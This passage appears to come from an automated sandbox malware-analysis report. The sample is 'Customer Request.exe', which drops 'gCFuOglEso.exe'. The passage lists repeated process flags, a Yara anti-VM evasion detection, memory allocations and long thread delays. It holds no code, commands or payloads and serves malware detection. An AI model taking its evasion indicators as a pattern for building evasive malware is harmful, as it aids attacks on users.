                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 4A50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 8E80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 9E80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: A090000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: B090000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: B6E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: C6E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: D6E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 9A50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: AA50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: 9A50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: C080000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeMemory allocated: D080000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: B10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 2520000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 2430000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 83C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 93C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 95C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: A5C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: ABF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: BBF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 2960000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 2A00000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 4A00000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 9520000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: A520000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: A750000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 9F20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeMemory allocated: 8620000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239843Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239731Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239624Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239515Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239406Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239269Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239140Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238996Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238848Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238718Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238437Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238031Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 237484Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 237371Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 237218Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 237062Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599451Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599235Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597736Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597361Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597167Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 597041Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596640Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596531Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596422Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596313Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596188Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 596063Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595594Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595469Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593938Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593799Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593672Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593563Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 593438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239870
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239764
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239640
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239531
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239421
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239310
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239202
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239079
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 238959
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599890
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599598
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599469
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599354
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599248
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599123
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599003
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598875
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598765
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598652
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598437
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598218
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598109
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598000
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597890
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597781
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597672
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597562
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597453
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597343
